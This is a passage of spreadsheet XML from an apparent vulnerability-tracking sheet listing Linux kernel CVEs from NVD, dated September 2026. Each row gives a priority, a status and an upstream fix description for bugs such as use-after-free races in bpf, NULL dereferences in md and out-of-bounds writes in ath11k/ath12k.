      <c r="M754" s="5" t="inlineStr"/>
      <c r="N754" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O754" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P754" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q754" s="5" t="inlineStr"/>
      <c r="R754" s="5" t="inlineStr"/>
      <c r="S754" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: dw: avoid shift-out-of-bounds when DAA assigns no devices
On an empty bus ENTDAA assigns nothing, so cmd-&gt;rx_len (the count
of addresses left unassigned) equals master-&gt;maxdevs.
The GENMASK() index master-&gt;maxdevs - cmd-&gt;rx_len - 1 then becomes -1,
which trips up UBSAN. This happens every time on boot on a Gigabyte/AMD
server:
    UBSAN: shift-out-of-bounds in drivers/i3c/master/dw-i3c-master.c:905:12
    shift exponent 64 is too large for 64-bit type 'long unsigned int'
    CPU: 7 UID: 0 PID: 963 Comm: (udev-worker) Not tainted 7.0.11-200.fc44.x86_64 #1 PREEMPT(lazy)
    Hardware name: Giga Computing E163-Z34-AAH1-000/MZ33-DC1-000, BIOS R32_F45 04/01/2026
    Call Trace:
     &lt;TASK&gt;
     dump_stack_lvl+0x5d/0x80
     ubsan_epilogue+0x5/0x2b
     __ubsan_handle_shift_out_of_bounds.cold+0xd7/0x1ab
     dw_i3c_master_daa.cold+0x1b/0x96 [dw_i3c_master]
     i3c_master_do_daa_ext.part.0+0x3e/0xf0 [i3c]
Skip the mask when no new device was assigned.</t>
        </is>
      </c>
      <c r="T754" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90386</t>
        </is>
      </c>
    </row>
    <row r="755">
      <c r="A755" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B755" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C755" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90387</t>
        </is>
      </c>
      <c r="D755" s="5" t="inlineStr"/>
      <c r="E755" s="5" t="inlineStr"/>
      <c r="F755" s="5" t="inlineStr"/>
      <c r="G755" s="5" t="inlineStr"/>
      <c r="H755" s="5" t="inlineStr"/>
      <c r="I755" s="5" t="inlineStr"/>
      <c r="J755" s="5" t="inlineStr"/>
      <c r="K755" s="5" t="inlineStr"/>
      <c r="L755" s="5" t="inlineStr"/>
      <c r="M755" s="5" t="inlineStr"/>
      <c r="N755" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O755" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P755" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q755" s="5" t="inlineStr"/>
      <c r="R755" s="5" t="inlineStr"/>
      <c r="S755" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
swiotlb: Preserve allocation virtual address for dynamic pools
swiotlb_alloc_tlb() can allocate from the DMA atomic pool when a decrypted
pool is needed from atomic context. With CONFIG_DMA_DIRECT_REMAP, the
atomic pool is backed by remapped virtual addresses, which are not the same
as the direct-map addresses returned by phys_to_virt().
swiotlb_init_io_tlb_pool() currently reconstructs the pool virtual address
from the physical start address. For atomic-pool backed allocations this
stores the wrong address in pool-&gt;vaddr. Later, swiotlb_free_tlb() passes
that address to dma_free_from_pool(), which will fail to recognize the
chunk
Pass the virtual address returned by the allocation path into
swiotlb_init_io_tlb_pool(), and store that address in pool-&gt;vaddr. This
keeps the pool free path using the same virtual address as the allocator.</t>
        </is>
      </c>
      <c r="T755" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90387</t>
        </is>
      </c>
    </row>
    <row r="756">
      <c r="A756" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B756" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C756" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90388</t>
        </is>
      </c>
      <c r="D756" s="5" t="inlineStr"/>
      <c r="E756" s="5" t="inlineStr"/>
      <c r="F756" s="5" t="inlineStr"/>
      <c r="G756" s="5" t="inlineStr"/>
      <c r="H756" s="5" t="inlineStr"/>
      <c r="I756" s="5" t="inlineStr"/>
      <c r="J756" s="5" t="inlineStr"/>
      <c r="K756" s="5" t="inlineStr"/>
      <c r="L756" s="5" t="inlineStr"/>
      <c r="M756" s="5" t="inlineStr"/>
      <c r="N756" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O756" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P756" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q756" s="5" t="inlineStr"/>
      <c r="R756" s="5" t="inlineStr"/>
      <c r="S756" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
iommu/dma: Check atomic pool allocation result directly
The non-blocking, non-coherent allocation path uses dma_alloc_from_pool(),
which returns the allocated page and fills cpu_addr only on success.
Do not rely on cpu_addr to detect allocation failure in this path. Check
the returned page directly before using it for the IOMMU mapping.</t>
        </is>
      </c>
      <c r="T756" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90388</t>
        </is>
      </c>
    </row>
    <row r="757">
      <c r="A757" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B757" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C757" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90389</t>
        </is>
      </c>
      <c r="D757" s="5" t="inlineStr"/>
      <c r="E757" s="5" t="inlineStr"/>
      <c r="F757" s="5" t="inlineStr"/>
      <c r="G757" s="5" t="inlineStr"/>
      <c r="H757" s="5" t="inlineStr"/>
      <c r="I757" s="5" t="inlineStr"/>
      <c r="J757" s="5" t="inlineStr"/>
      <c r="K757" s="5" t="inlineStr"/>
      <c r="L757" s="5" t="inlineStr"/>
      <c r="M757" s="5" t="inlineStr"/>
      <c r="N757" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O757" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P757" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q757" s="5" t="inlineStr"/>
      <c r="R757" s="5" t="inlineStr"/>
      <c r="S757" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: scope memalloc_noio to allocation critical sections
Storing a memalloc_noio_save() token in mddev-&gt;noio_flags lets one task
save the token and another task restore it. With concurrent suspend sysfs
writes, task A can enter PF_MEMALLOC_NOIO, return to userspace still in
that scope, and later task B can restore A's saved token.
Avoid tying the token lifetime to mddev. Keep mddev_suspend() and
mddev_resume() only responsible for array suspension, and enter
PF_MEMALLOC_NOIO only in the MD paths that allocate memory after the array
has been suspended. Restore the token before resuming the array.
A reproducer repeatedly writes suspend_lo and suspend_hi from concurrent
workers and checks each worker's /proc/self/stat flags before and after the
sysfs write.</t>
        </is>
      </c>
      <c r="T757" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90389</t>
        </is>
      </c>
    </row>
    <row r="758">
      <c r="A758" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B758" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C758" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90390</t>
        </is>
      </c>
      <c r="D758" s="5" t="inlineStr"/>
      <c r="E758" s="5" t="inlineStr"/>
      <c r="F758" s="5" t="inlineStr"/>
      <c r="G758" s="5" t="inlineStr"/>
      <c r="H758" s="5" t="inlineStr"/>
      <c r="I758" s="5" t="inlineStr"/>
      <c r="J758" s="5" t="inlineStr"/>
      <c r="K758" s="5" t="inlineStr"/>
      <c r="L758" s="5" t="inlineStr"/>
      <c r="M758" s="5" t="inlineStr"/>
      <c r="N758" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O758" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P758" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q758" s="5" t="inlineStr"/>
      <c r="R758" s="5" t="inlineStr"/>
      <c r="S758" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/bitmap: resume array on backlog_store() error path
backlog_store() suspends the array before checking whether a write-mostly
device exists. If no such device exists, the error path only unlocks
reconfig_mutex and leaves the array suspended, blocking subsequent I/O.
Use mddev_unlock_and_resume() to release both states.</t>
        </is>
      </c>
      <c r="T758" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90390</t>
        </is>
      </c>
    </row>
    <row r="759">
      <c r="A759" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B759" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C759" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90391</t>
        </is>
      </c>
      <c r="D759" s="5" t="inlineStr"/>
      <c r="E759" s="5" t="inlineStr"/>
      <c r="F759" s="5" t="inlineStr"/>
      <c r="G759" s="5" t="inlineStr"/>
      <c r="H759" s="5" t="inlineStr"/>
      <c r="I759" s="5" t="inlineStr"/>
      <c r="J759" s="5" t="inlineStr"/>
      <c r="K759" s="5" t="inlineStr"/>
      <c r="L759" s="5" t="inlineStr"/>
      <c r="M759" s="5" t="inlineStr"/>
      <c r="N759" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O759" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P759" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q759" s="5" t="inlineStr"/>
      <c r="R759" s="5" t="inlineStr"/>
      <c r="S759" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
lib/test_hmm: fail dmirror_fault() when the mirrored mm is gone
dmirror_fault() is called from the dmirror_read() and dmirror_write()
retry loops after dmirror_do_read() or dmirror_do_write() finds a missing
device page table entry.
If the mirrored mm has already exited, mmget_not_zero() fails.  The
current code returns 0 in that case, which tells the caller that faulting
succeeded even though no page was faulted and no device page table entry
was installed.  The caller then retries the same address, hits -ENOENT
again, and can loop forever without making progress.
Return -EFAULT instead, so the ioctl fails when the mirrored mm is no
longer faultable.</t>
        </is>
      </c>
      <c r="T759" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90391</t>
        </is>
      </c>
    </row>
    <row r="760">
      <c r="A760" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B760" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C760" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90392</t>
        </is>
      </c>
      <c r="D760" s="5" t="inlineStr"/>
      <c r="E760" s="5" t="inlineStr"/>
      <c r="F760" s="5" t="inlineStr"/>
      <c r="G760" s="5" t="inlineStr"/>
      <c r="H760" s="5" t="inlineStr"/>
      <c r="I760" s="5" t="inlineStr"/>
      <c r="J760" s="5" t="inlineStr"/>
      <c r="K760" s="5" t="inlineStr"/>
      <c r="L760" s="5" t="inlineStr"/>
      <c r="M760" s="5" t="inlineStr"/>
      <c r="N760" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O760" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P760" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q760" s="5" t="inlineStr"/>
      <c r="R760" s="5" t="inlineStr"/>
      <c r="S760" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix potential UAF when reading bpf link info
In bpf_link_show_fdinfo and bpf_link_get_info_by_fd, link-&gt;prog is
accessed without holding any locks. If the prog is concurrently replaced
via bpf_link_update, the old prog can be freed, leading to a potential
UAF issue.
Fix this by accessing link-&gt;prog under RCU protection to safely fetch
the pointer and guarantee its lifetime while reading its fields.</t>
        </is>
      </c>
      <c r="T760" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90392</t>
        </is>
      </c>
    </row>
    <row r="761">
      <c r="A761" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B761" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C761" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90393</t>
        </is>
      </c>
      <c r="D761" s="5" t="inlineStr"/>
      <c r="E761" s="5" t="inlineStr"/>
      <c r="F761" s="5" t="inlineStr"/>
      <c r="G761" s="5" t="inlineStr"/>
      <c r="H761" s="5" t="inlineStr"/>
      <c r="I761" s="5" t="inlineStr"/>
      <c r="J761" s="5" t="inlineStr"/>
      <c r="K761" s="5" t="inlineStr"/>
      <c r="L761" s="5" t="inlineStr"/>
      <c r="M761" s="5" t="inlineStr"/>
      <c r="N761" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O761" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P761" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q761" s="5" t="inlineStr"/>
      <c r="R761" s="5" t="inlineStr"/>
      <c r="S761" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Fix potential UAF in bpf_netns_link_update_prog
In bpf_netns_link_update_prog, the checks for old_prog and prog type
are currently performed locklessly before acquiring netns_bpf_mutex.
This creates a race condition that can lead to a UAF issue.
If two threads concurrently execute BPF_LINK_UPDATE on the same netns
link, the following execution path can trigger a UAF:
CPU0                                          CPU1
bpf_netns_link_update_prog
  if (old_prog &amp;&amp; old_prog != link-&gt;prog)
    return -EPERM;
                                              bpf_netns_link_update_prog
                                                if (old_prog &amp;&amp; old_prog != link-&gt;prog)
                                                ...
                                                old_prog = xchg(&amp;link-&gt;prog, new_prog);
                                                bpf_prog_put(old_prog);
  if (new_prog-&gt;type != link-&gt;prog-&gt;type) &lt;-- trigger UAF
Fix this by moving the old_prog and prog-&gt;type checks inside the
netns_bpf_mutex critical section. Meanwhile, use guard() to simplify
lock management and avoid all the goto jumping.</t>
        </is>
      </c>
      <c r="T761" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90393</t>
        </is>
      </c>
    </row>
    <row r="762">
      <c r="A762" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B762" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C762" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90394</t>
        </is>
      </c>
      <c r="D762" s="5" t="inlineStr"/>
      <c r="E762" s="5" t="inlineStr"/>
      <c r="F762" s="5" t="inlineStr"/>
      <c r="G762" s="5" t="inlineStr"/>
      <c r="H762" s="5" t="inlineStr"/>
      <c r="I762" s="5" t="inlineStr"/>
      <c r="J762" s="5" t="inlineStr"/>
      <c r="K762" s="5" t="inlineStr"/>
      <c r="L762" s="5" t="inlineStr"/>
      <c r="M762" s="5" t="inlineStr"/>
      <c r="N762" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O762" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P762" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q762" s="5" t="inlineStr"/>
      <c r="R762" s="5" t="inlineStr"/>
      <c r="S762" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: sc2731_charger: cancel work on remove
The USB notifier and initial charger detection can schedule info-&gt;work.
The remove path unregisters the notifier, but does not cancel queued or
running work before the devm-allocated driver data is released.
Set the platform drvdata used by remove, then cancel the work after
unregistering the notifier.
This issue was found by a static analysis tool.</t>
        </is>
      </c>
      <c r="T762" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90394</t>
        </is>
      </c>
    </row>
    <row r="763">
      <c r="A763" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B763" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C763" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90395</t>
        </is>
      </c>
      <c r="D763" s="5" t="inlineStr"/>
      <c r="E763" s="5" t="inlineStr"/>
      <c r="F763" s="5" t="inlineStr"/>
      <c r="G763" s="5" t="inlineStr"/>
      <c r="H763" s="5" t="inlineStr"/>
      <c r="I763" s="5" t="inlineStr"/>
      <c r="J763" s="5" t="inlineStr"/>
      <c r="K763" s="5" t="inlineStr"/>
      <c r="L763" s="5" t="inlineStr"/>
      <c r="M763" s="5" t="inlineStr"/>
      <c r="N763" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O763" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P763" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q763" s="5" t="inlineStr"/>
      <c r="R763" s="5" t="inlineStr"/>
      <c r="S763" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: isp1704_charger: cancel work on remove
The USB notifier and initial VBUS detection can schedule isp-&gt;work. The
remove path unregisters the notifier and power supply, but does not wait
for queued or running work before tearing down the power supply state.
Cancel the work after unregistering the notifier. Do this before
unregistering the power supply.
This issue was found by a static analysis tool.</t>
        </is>
      </c>
      <c r="T763" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90395</t>
        </is>
      </c>
    </row>
    <row r="764">
      <c r="A764" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B764" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C764" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90396</t>
        </is>
      </c>
      <c r="D764" s="5" t="inlineStr"/>
      <c r="E764" s="5" t="inlineStr"/>
      <c r="F764" s="5" t="inlineStr"/>
      <c r="G764" s="5" t="inlineStr"/>
      <c r="H764" s="5" t="inlineStr"/>
      <c r="I764" s="5" t="inlineStr"/>
      <c r="J764" s="5" t="inlineStr"/>
      <c r="K764" s="5" t="inlineStr"/>
      <c r="L764" s="5" t="inlineStr"/>
      <c r="M764" s="5" t="inlineStr"/>
      <c r="N764" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O764" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P764" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q764" s="5" t="inlineStr"/>
      <c r="R764" s="5" t="inlineStr"/>
      <c r="S764" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
block: fix dio leak on metadata mapping error
A failed integrity mapping holds a dio reference, so we need to go
through the full bio ending in case there were previously submitted
bio's in the sequence.</t>
        </is>
      </c>
      <c r="T764" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90396</t>
        </is>
      </c>
    </row>
    <row r="765">
      <c r="A765" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B765" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C765" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90397</t>
        </is>
      </c>
      <c r="D765" s="5" t="inlineStr"/>
      <c r="E765" s="5" t="inlineStr"/>
      <c r="F765" s="5" t="inlineStr"/>
      <c r="G765" s="5" t="inlineStr"/>
      <c r="H765" s="5" t="inlineStr"/>
      <c r="I765" s="5" t="inlineStr"/>
      <c r="J765" s="5" t="inlineStr"/>
      <c r="K765" s="5" t="inlineStr"/>
      <c r="L765" s="5" t="inlineStr"/>
      <c r="M765" s="5" t="inlineStr"/>
      <c r="N765" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O765" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P765" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q765" s="5" t="inlineStr"/>
      <c r="R765" s="5" t="inlineStr"/>
      <c r="S765" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: qcom: scm: Fix NULL dereference in IRQ handler before __scm is published
In qcom_scm_probe(), devm_request_threaded_irq() is called before
smp_store_release(&amp;__scm, scm). Two paths can dereference __scm before
it is published, both causing a NULL pointer dereference.
The IRQ handler receives scm via its data argument but passes only wq_ctx
to qcom_scm_waitq_wakeup() and qcom_scm_get_completion(), which then
dereference __scm directly. Thread scm through both functions so the IRQ
handler path never touches __scm.
Non-atomic SMC calls made during probe (e.g. from qcom_tzmem_init via
qcom_scm_shm_bridge_enable) can return WAITQ_SLEEP, causing
qcom_scm_wait_for_wq_completion() to run before __scm is published and
dereference it. Add platform_set_drvdata(pdev, scm) early in probe and
change qcom_scm_wait_for_wq_completion() to take the device pointer and
use dev_get_drvdata() to reach scm, removing any dependency on __scm.</t>
        </is>
      </c>
      <c r="T765" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90397</t>
        </is>
      </c>
    </row>
    <row r="766">
      <c r="A766" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B766" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C766" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90398</t>
        </is>
      </c>
      <c r="D766" s="5" t="inlineStr"/>
      <c r="E766" s="5" t="inlineStr"/>
      <c r="F766" s="5" t="inlineStr"/>
      <c r="G766" s="5" t="inlineStr"/>
      <c r="H766" s="5" t="inlineStr"/>
      <c r="I766" s="5" t="inlineStr"/>
      <c r="J766" s="5" t="inlineStr"/>
      <c r="K766" s="5" t="inlineStr"/>
      <c r="L766" s="5" t="inlineStr"/>
      <c r="M766" s="5" t="inlineStr"/>
      <c r="N766" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O766" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P766" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q766" s="5" t="inlineStr"/>
      <c r="R766" s="5" t="inlineStr"/>
      <c r="S766" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath11k: fix stride mismatch in mac_phy_caps_parse()
Currently, in ath11k_wmi_tlv_mac_phy_caps_parse(), kcalloc() sizes the
mac_phy_caps buffer as tot_phy_id * len, where len is clamped to
min(firmware_len, sizeof(struct wmi_mac_phy_capabilities)). The subsequent
memcpy() destination advances by sizeof(full struct) per slot via C
pointer arithmetic, not by the clamped len. When firmware sends short
TLVs, the second and later slots are written past the end of the
allocation.
The reader in ath11k_pull_mac_phy_cap_svc_ready_ext() also indexes the
buffer with full-struct pointer arithmetic, so the allocation must match
that stride.
Fix by using kzalloc_objs(), which derives the element size from the
pointer type, making allocation size and pointer stride provably
consistent regardless of what len the firmware provides.
Compile tested only.</t>
        </is>
      </c>
      <c r="T766" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90398</t>
        </is>
      </c>
    </row>
    <row r="767">
      <c r="A767" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B767" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C767" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90399</t>
        </is>
      </c>
      <c r="D767" s="5" t="inlineStr"/>
      <c r="E767" s="5" t="inlineStr"/>
      <c r="F767" s="5" t="inlineStr"/>
      <c r="G767" s="5" t="inlineStr"/>
      <c r="H767" s="5" t="inlineStr"/>
      <c r="I767" s="5" t="inlineStr"/>
      <c r="J767" s="5" t="inlineStr"/>
      <c r="K767" s="5" t="inlineStr"/>
      <c r="L767" s="5" t="inlineStr"/>
      <c r="M767" s="5" t="inlineStr"/>
      <c r="N767" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O767" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P767" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q767" s="5" t="inlineStr"/>
      <c r="R767" s="5" t="inlineStr"/>
      <c r="S767" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath12k: fix stride mismatch in mac_phy_caps_parse()
Currently, in ath12k_wmi_mac_phy_caps_parse(), kzalloc() sizes the
mac_phy_caps buffer as tot_phy_id * len, where len is clamped to
min(firmware_len, sizeof(struct ath12k_wmi_mac_phy_caps_params)). The
subsequent memcpy() destination advances by sizeof(full struct) per slot
via C pointer arithmetic, not by the clamped len. When firmware sends
short TLVs, the second and later slots are written past the end of the
allocation.
The reader in ath12k_pull_mac_phy_cap_svc_ready_ext() also indexes the
buffer with full-struct pointer arithmetic, so the allocation must match
that stride.
Fix by using kzalloc_objs(), which derives the element size from the
pointer type, making allocation size and pointer stride provably
consistent regardless of what len the firmware provides.
Tested-on: WCN7850 hw2.0 PCI WLAN.HMT.1.1.c7-00108-QCAHMTSWPL_V1.0_V2.0_SILICONZ_UPSTREAM-3</t>
        </is>
      </c>
      <c r="T767" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90399</t>
        </is>
      </c>
    </row>
    <row r="768">
      <c r="A768" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B768" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C768" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90400</t>
        </is>
      </c>
      <c r="D768" s="5" t="inlineStr"/>
      <c r="E768" s="5" t="inlineStr"/>
      <c r="F768" s="5" t="inlineStr"/>
      <c r="G768" s="5" t="inlineStr"/>
      <c r="H768" s="5" t="inlineStr"/>
      <c r="I768" s="5" t="inlineStr"/>
      <c r="J768" s="5" t="inlineStr"/>
      <c r="K768" s="5" t="inlineStr"/>
      <c r="L768" s="5" t="inlineStr"/>
      <c r="M768" s="5" t="inlineStr"/>
      <c r="N768" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O768" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P768" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q768" s="5" t="inlineStr"/>
      <c r="R768" s="5" t="inlineStr"/>
      <c r="S768" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md: recheck spare changes before starting sync
remove_spares() and remove_and_add_spares() modify the array's rdev
configuration. These operations are only safe after the array has been
suspended.
md_start_sync() checks whether spare configuration changes are needed
before taking reconfig_mutex. However, the rdev state can change before
the mutex is acquired, so the initial check can become stale. In that
case, md_choose_sync_action() may remove or replace rdevs while normal
I/O is still accessing them.
The race can occur as follows:
raid10d          Worker                      Normal IO
____________     _______________________     ______________________
                                             raid10_write_request()
                                             wait_blocked_dev()
set Blocked
set Faulty
                                             Skip Faulty rdev
                                             rrdev-&gt;nr_pending++
                                             .repl_bio = bio
                 removeable_rdev = false     .
                 array not suspended         .
lock mddev                                   goto err_handle
                 lock mddev (wait)
                 .
update sb        .
clear Blocked    .
                 .
unlock mddev     .
                 lock mddev (acquires)
                 remove_spares()
                 removeable_rdev = true
                 raid10_remove_disk()
                 rdev = replacement
                 replacement = NULL
                                             rdev_dec_pending(NULL)
                 unlock mddev                (NULL)-&gt;nr_pending--
In this case, rdev_dec_pending() is called with a NULL pointer,
resulting in a NULL pointer dereference when attempting to decrement
nr_pending.
Fix this by suspending the array when spare configuration changes are
needed, including for non-read-write arrays, and checking again after
taking reconfig_mutex. If the array was not already suspended and a
change is now needed, release the mutex, suspend the array, and
reacquire the mutex before continuing.</t>
        </is>
      </c>
      <c r="T768" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90400</t>
        </is>
      </c>
    </row>
    <row r="769">
      <c r="A769" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
